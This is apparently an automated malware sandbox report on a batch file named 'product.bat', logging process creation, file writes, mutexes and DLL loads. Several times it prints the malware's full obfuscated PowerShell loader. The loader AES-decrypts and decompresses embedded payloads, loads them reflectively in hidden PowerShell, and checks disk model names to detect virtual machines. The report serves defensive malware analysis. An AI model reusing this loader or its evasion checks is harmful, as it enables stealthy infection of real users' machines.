Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeA
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.dr Binary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: System.evtx.36.dr Binary string: \Device\HarddiskVolume3\Windows\System32\svchost.exeT
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.36.dr Binary string: 5\Device\HarddiskVolume3\Windows\System32\services.exe
Source: System.evtx.36.dr Binary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.dr Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.36.dr Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.36.dr Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Security.evtx.36.dr Binary string: \Device\HarddiskVolume3\Windows\System32\drivers\filetrace.syssio
Source: classification engine Classification label: mal100.spyw.evad.winBAT@32/74@2/1
Source: C:\Windows\System32\dllhost.exe Code function: 14_2_0000000140002D4C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx, 14_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exe Code function: 14_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 14_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1504:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\7c3f3d12-14bf-4271-9822-a770c887ff1d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4aekovv1.sfn.ps1
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\product.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", 
"A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", 
"A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", 
"A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{372c9116-8a11-4207-941c-c83db9f8d8a2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\product.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", 
"A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{29a28251-c10b-42e7-8393-a6c218333ff2}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
